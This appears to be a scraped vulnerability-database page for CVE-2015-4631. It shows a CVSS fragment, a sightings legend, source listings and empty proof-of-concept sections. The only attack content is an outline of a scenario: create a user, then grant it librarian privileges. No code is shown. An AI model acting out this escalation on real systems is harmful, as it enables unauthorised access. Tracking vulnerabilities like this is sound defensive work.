            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      },
      "lastModifiedDate": "2018-12-04T20:01Z",
      "publishedDate": "2018-10-18T21:29Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2015-4631 (GCVE-0-2015-4631)

Vulnerability from cvelistv5

var-201810-0024

Vulnerability from variot

Vulnerability:

References:

##################################################################################################

PoC:

##################################################################################################

References:

##################################################################################################

PoC:

##################################################################################################

##################################################################################################

PoC End

##################################################################################################

Vulnerability

References

##################################################################################################

PoC:

##################################################################################################

##################################################################################################

PoC End

##################################################################################################

References

##################################################################################################

PoC / Attack Scenario:

##################################################################################################

Create new user:

Give the new user superlibririan permission:

##################################################################################################

PoC / Attack Scenario End

##################################################################################################

fkie_cve-2015-4631

Vulnerability from fkie_nvd

ghsa-24mg-jwcv-j892

Vulnerability from github

gsd-2015-4631

Vulnerability from gsd

Tags

Sightings

Nomenclature